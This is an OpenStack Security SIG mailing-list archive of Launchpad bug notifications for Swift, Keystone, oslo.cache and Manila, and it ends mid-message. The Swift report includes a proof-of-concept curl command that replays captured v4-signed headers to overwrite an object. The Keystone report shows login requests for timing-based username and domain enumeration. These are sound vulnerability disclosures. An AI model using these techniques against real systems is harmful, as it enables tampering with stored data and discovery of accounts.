to: https://bugs.launchpad.net/keystone/+bug/1792047/+subscriptions From 1816836 at bugs.launchpad.net Fri Mar 22 13:37:35 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Fri, 22 Mar 2019 13:37:35 -0000 Subject: [Openstack-security] [Bug 1816836] Fix included in openstack/manila 8.0.0.0rc1 References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155326185600.18358.10548555287180305909.malone@gac.canonical.com> This issue was fixed in the openstack/manila 8.0.0.0rc1 release candidate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From morgan.fainberg at gmail.com Mon Mar 25 10:15:47 2019 From: morgan.fainberg at gmail.com (Morgan Fainberg) Date: Mon, 25 Mar 2019 10:15:47 -0000 Subject: [Openstack-security] [Bug 1819957] Re: Caching with stale data when a server disconnects due to network partition and reconnects References: <155250258380.27992.5839797432076968036.malonedeb@wampee.canonical.com> Message-ID: <155350894732.18322.11613685004239826838.malone@gac.canonical.com> Keystone is fixed with oslo.cache fix, marked as invalid for keystone ** Changed in: keystone Status: Triaged => Invalid -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1819957 Title: Caching with stale data when a server disconnects due to network partition and reconnects Status in OpenStack Identity (keystone): Invalid Status in keystonemiddleware: Triaged Status in oslo.cache: In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: The flush_on_reconnect optional flag is not used. This can cause stale data to be utilized from a cache server that disconnected due to a network partition. This has security concerns as follows: 1* Password changes/user changes may be reverted for the cache TTL 1a* User may get locked out if PCI-DSS is on and the password change happens during the network partition. 2* Grant changes may be reverted for the cache TTL 3* Resources (all types) may become "undeleted" for the cache TTL 4* Tokens (KSM) may become valid again during the cache TTL As noted in the python-memcached library: @param flush_on_reconnect: optional flag which prevents a scenario that can cause stale data to be read: If there's more than one memcached server and the connection to one is interrupted, keys that mapped to that server will get reassigned to another. If the first server comes back, those keys will map to it again. If it still has its data, get()s can read stale data that was overwritten on another server. This flag is off by default for backwards compatibility. The solution is to explicitly pass flush_on_reconnect as an optional argument. A concern with this model is that the memcached servers may be utilized by other tooling and may lose cache state (in the case the oslo.cache connection is the only thing affected by the network partitioning). This similarly needs to be addressed in pymemcache when it is utilized in lieu of python-memcached. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1819957/+subscriptions From 1765834 at bugs.launchpad.net Mon Mar 25 17:07:23 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Mon, 25 Mar 2019 17:07:23 -0000 Subject: [Openstack-security] [Bug 1765834] Fix included in openstack/swift 2.21.0 References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155353364322.17795.16964866051519343160.malone@gac.canonical.com> This issue was fixed in the openstack/swift 2.21.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From gagehugo at gmail.com Mon Mar 25 19:24:57 2019 From: gagehugo at gmail.com (Gage Hugo) Date: Mon, 25 Mar 2019 19:24:57 -0000 Subject: [Openstack-security] [Bug 1795800] Re: Timing oracle in core auth plugin simplifies brute-forcing usernames References: <153854884921.22301.15072922945681177517.malonedeb@gac.canonical.com> Message-ID: <155354189743.19092.6711145921986360383.malone@chaenomeles.canonical.com> Still working on this, I've gotten a flask hook setup to catch any unauthorized, allowing us to delay the Unauthorized exception until the very end, however I'm still not seeing identical times. Local testing is showing .480 seconds for an existing user while it's gone from ~0.022 to ~0.033 for invalid users with delaying the exception. I'm wondering if this is due to the delay with generating a token for successful authentication, instead of simply continuing on when failing to authenticate. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1795800 Title: Timing oracle in core auth plugin simplifies brute-forcing usernames Status in OpenStack Identity (keystone): In Progress Status in OpenStack Security Advisory: Won't Fix Bug description: The response times for POST /v3/auth/tokens are significantly higher for valid usernames compared to those of invalid ones, making it possible to enumerate users on the system. Examples: # For invalid username + Request POST /v3/auth/tokens HTTP/1.1 Host: hostname:5000 Connection: close Content-Length: 141 Content-Type: application/json { "auth":{ "identity":{ "methods":[ "password" ], "password":{ "user":{ "name":"nonexisting", "domain":{ "name":"Default" }, "password":"devstacker" } } } } } + Response Time: <150ms # For valid username ('admin' in this case) + Request POST /v3/auth/tokens HTTP/1.1 Host: hostname:5000 Connection: close Content-Length: 139 Content-Type: application/json { "auth":{ "identity":{ "methods":[ "password" ], "password":{ "user":{ "name":"admin", "domain":{ "name":"Default" }, "password":"devstacker" } } } } } + Response time: >600ms # Tested version v3.8 [UPDATE 3 Oct 2018 5:01 AEST] Looks like it's also possible to enumerate for valid "domain" too. There're 2 ways that I can see: * With valid username: use the above user enum bug to guess the valid username, then brute the "domain" parameter. Response times are significantly higher for valid compared to invalid domains. * Without valid username: get a baseline response time using invalid username AND invalid domain name. Bruteforce the "domain" param until the response time hits an average high. For me invalid domain falls in the 90-100ms range whereas valid ones show 100+ms. This one looks a bit more obscure i.e. timing difference is not as distinguishable, but should still be recognizable with a good sample size. To manage notifications about this bug go to: https://bugs.launchpad.net/keystone/+bug/1795800/+subscriptions From 1816836 at bugs.launchpad.net Tue Mar 26 21:51:22 2019 From: 1816836 at bugs.launchpad.net (OpenStack Infra) Date: Tue, 26 Mar 2019 21:51:22 -0000 Subject: [Openstack-security] [Bug 1816836] Fix included in openstack/manila 7.2.0 References: <155068881794.22969.12262308667168798263.malonedeb@wampee.canonical.com> Message-ID: <155363708295.9976.13358468866954796839.malone@wampee.canonical.com> This issue was fixed in the openstack/manila 7.2.0 release. -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1816836 Title: manila's devstack plugin fails with tls_proxy enabled Status in Manila: Fix Released Bug description: This bug was exposed in https://review.openstack.org/#/c/625191/ (Relevant log files have been attached to this bug report). Manila's devstack plugin sets the listen port to 18786 when tls_proxy has been enabled on devstack, but performs a health check on the API service on the default/non-tls port (8786) [2]. This check causes devstack to fail. [1] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L280 [2] https://github.com/openstack/manila/blob/22d25e8/devstack/plugin.sh#L830 To manage notifications about this bug go to: https://bugs.launchpad.net/manila/+bug/1816836/+subscriptions From 1765834 at bugs.launchpad.net Wed Mar 27 21:11:13 2019 From: 1765834 at bugs.launchpad.net (OpenStack Infra) Date: Wed, 27 Mar 2019 21:11:13 -0000 Subject: [Openstack-security] [Bug 1765834] Fix proposed to swift (feature/losf) References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155372107395.18089.3234092110919133996.malone@gac.canonical.com> Fix proposed to branch: feature/losf Review: https://review.openstack.org/648245 -- You received this bug notification because you are a member of OpenStack Security SIG, which is subscribed to OpenStack. https://bugs.launchpad.net/bugs/1765834 Title: Need to verify content of v4-signed PUTs Status in OpenStack Security Advisory: Won't Fix Status in OpenStack Object Storage (swift): Fix Released Status in Swift3: New Bug description: This issue is being treated as a potential security risk under embargo. Please do not make any public mention of embargoed (private) security vulnerabilities before their coordinated publication by the OpenStack Vulnerability Management Team in the form of an official OpenStack Security Advisory. This includes discussion of the bug or associated fixes in public forums such as mailing lists, code review systems and bug trackers. Please also avoid private disclosure to other individuals not already approved for access to this information, and provide this same reminder to those who are made aware of the issue prior to publication. All discussion should remain confined to this private bug report, and any proposed fixes should be added to the bug as attachments. When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As a result, an attacker that manages to capture the headers for a PUT request has a 5-minute window to overwrite the object with arbitrary content of the same length: [11:50:08] $ echo 'GOOD' > good.txt [11:50:12] $ echo 'BAD!' > bad.txt [11:50:36] $ s3cmd put --debug good.txt s3://bucket DEBUG: s3cmd version 1.6.1 DEBUG: ConfigParser: Reading file '/Users/tburke/.s3cfg' DEBUG: ConfigParser: access_key->te...8_chars...r DEBUG: ConfigParser: secret_key->te...4_chars...g DEBUG: ConfigParser: host_base->saio:8080 DEBUG: ConfigParser: host_bucket->saio:8080 DEBUG: ConfigParser: use_https->False DEBUG: Updating Config.Config cache_file -> DEBUG: Updating Config.Config follow_symlinks -> False DEBUG: Updating Config.Config verbosity -> 10 DEBUG: Unicodising 'put' using UTF-8 DEBUG: Unicodising 'good.txt' using UTF-8 DEBUG: Unicodising 's3://bucket' using UTF-8 DEBUG: Command: put DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Compiling list of local files... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Unicodising '' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Applying --exclude/--include DEBUG: CHECK: good.txt DEBUG: PASS: u'good.txt' INFO: Running stat() and reading/calculating MD5 values on 1 files, this may take some time... DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: doing file I/O to read md5 of good.txt DEBUG: DeUnicodising u'good.txt' using UTF-8 INFO: Summary: 1 local files to upload DEBUG: attr_header: {'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212'} DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: String 'good.txt' encoded to 'good.txt' DEBUG: CreateRequest: resource[uri]=/good.txt DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=e79e1dd2fcd3ba125d3186abdbaf428992c478ad59380eab4d81510cfc494e43'} DEBUG: Unicodising 'good.txt' using UTF-8 upload: 'good.txt' -> 's3://bucket/good.txt' [1 of 1] DEBUG: DeUnicodising u'good.txt' using UTF-8 DEBUG: Using signature v4 DEBUG: get_hostname(bucket): saio:8080 DEBUG: canonical_headers = content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD DEBUG: Canonical Request: PUT /bucket/good.txt content-length:5 content-type:text/plain host:saio:8080 x-amz-content-sha256:d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 x-amz-date:20180420T185102Z x-amz-meta-s3cmd-attrs:uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 x-amz-storage-class:STANDARD content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 ---------------------- DEBUG: signature-v4 headers: {'x-amz-content-sha256': 'd43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7', 'content-length': '5', 'x-amz-storage-class': 'STANDARD', 'x-amz-meta-s3cmd-attrs': 'uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212', 'x-amz-date': '20180420T185102Z', 'content-type': 'text/plain', 'Authorization': 'AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b'} DEBUG: get_hostname(bucket): saio:8080 DEBUG: ConnMan.get(): creating new connection: http://saio:8080 DEBUG: non-proxied HTTPConnection(saio:8080) DEBUG: format_uri(): /bucket/good.txt  5 of 5 100% in 0s 373.44 B/sDEBUG: ConnMan.put(): connection put back to pool (http://saio:8080#1) DEBUG: Response: {'status': 200, 'headers': {'content-length': '0', 'x-amz-id-2': 'tx98be5ca4733e430eb4a76-005ada3696', 'x-trans-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'last-modified': 'Fri, 20 Apr 2018 18:51:03 GMT', 'etag': '"f9d9dc2bab2572ba95cfd67b596a6d1a"', 'x-amz-request-id': 'tx98be5ca4733e430eb4a76-005ada3696', 'date': 'Fri, 20 Apr 2018 18:51:02 GMT', 'content-type': 'text/html; charset=UTF-8', 'x-openstack-request-id': 'tx98be5ca4733e430eb4a76-005ada3696'}, 'reason': 'OK', 'data': '', 'size': 5L}  5 of 5 100% in 0s 56.02 B/s done DEBUG: MD5 sums: computed=f9d9dc2bab2572ba95cfd67b596a6d1a, received="f9d9dc2bab2572ba95cfd67b596a6d1a" /Users/tburke/.virtualenvs/Python27/lib/python2.7/site-packages/magic/identify.py:62: RuntimeWarning: Implicitly cleaning up   CleanupWarning) [11:51:02] $ curl -v http://saio:8080/bucket/good.txt -T bad.txt -H 'x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7' -H 'x-amz-storage-class: STANDARD' -H 'x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212' -H 'x-amz-date: 20180420T185102Z' -H 'content-type: text/plain' -H 'Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b' * Trying 192.168.8.80... * TCP_NODELAY set * Connected to saio (192.168.8.80) port 8080 (#0) > PUT /bucket/good.txt HTTP/1.1 > Host: saio:8080 > User-Agent: curl/7.54.0 > Accept: application/json;q=1, text/*;q=.9, */*;q=.8 > x-amz-content-sha256: d43cf775e7609f1274a4cd97b7649be036b01a6e22d6a04038ecd51811652cf7 > x-amz-storage-class: STANDARD > x-amz-meta-s3cmd-attrs: uid:501/gname:staff/uname:tburke/gid:20/mode:33188/mtime:1524250212/atime:1524250212/md5:f9d9dc2bab2572ba95cfd67b596a6d1a/ctime:1524250212 > x-amz-date: 20180420T185102Z > content-type: text/plain > Authorization: AWS4-HMAC-SHA256 Credential=test:tester/20180420/US/s3/aws4_request,SignedHeaders=content-length;content-type;host;x-amz-content-sha256;x-amz-date;x-amz-meta-s3cmd-attrs;x-amz-storage-class,Signature=63a27138d8f6fd0320a15f8ef8bf95474246c80a38ed68693c58173cefd8589b > Content-Length: 5 > Expect: 100-continue > < HTTP/1.1 100 Continue * We are completely uploaded and fine < HTTP/1.1 200 OK < Content-Length: 0 < x-amz-id-2: tx348d466b04cd425b81760-005ada3718 < Last-Modified: Fri, 20 Apr 2018 18:53:13 GMT < ETag: "6cd890020ad6ab38782de144aa831f24" < x-amz-request-id: tx348d466b04cd425b81760-005ada3718 < Content-Type: text/html; charset=UTF-8 < X-Trans-Id: tx348d466b04cd425b81760-005ada3718 < X-Openstack-Request-Id: tx348d466b04cd425b81760-005ada3718 < Date: Fri, 20 Apr 2018 18:53:13 GMT < * Connection #0 to host saio left intact --- I've attached a fix, but it could use tests :-/ To manage notifications about this bug go to: https://bugs.launchpad.net/ossa/+bug/1765834/+subscriptions From fungi at yuggoth.org Wed Mar 27 21:28:17 2019 From: fungi at yuggoth.org (Jeremy Stanley) Date: Wed, 27 Mar 2019 21:28:17 -0000 Subject: [Openstack-security] [Bug 1765834] Re: Need to verify content of v4-signed PUTs References: <152425525840.12613.15760107536105434168.malonedeb@gac.canonical.com> Message-ID: <155372209849.19401.16618732633314131000.launchpad@chaenomeles.canonical.com> ** Description changed: - This issue is being treated as a potential security risk under embargo. - Please do not make any public mention of embargoed (private) security - vulnerabilities before their coordinated publication by the OpenStack - Vulnerability Management Team in the form of an official OpenStack - Security Advisory. This includes discussion of the bug or associated - fixes in public forums such as mailing lists, code review systems and - bug trackers. Please also avoid private disclosure to other individuals - not already approved for access to this information, and provide this - same reminder to those who are made aware of the issue prior to - publication. All discussion should remain confined to this private bug - report, and any proposed fixes should be added to the bug as - attachments. - When we added support for v4 signatures, we (correctly) require that the client provide a X-Amz-Content-SHA256 header and use it in computing the expected signature. However, we never verify that the content sent actually matches the SHA! As 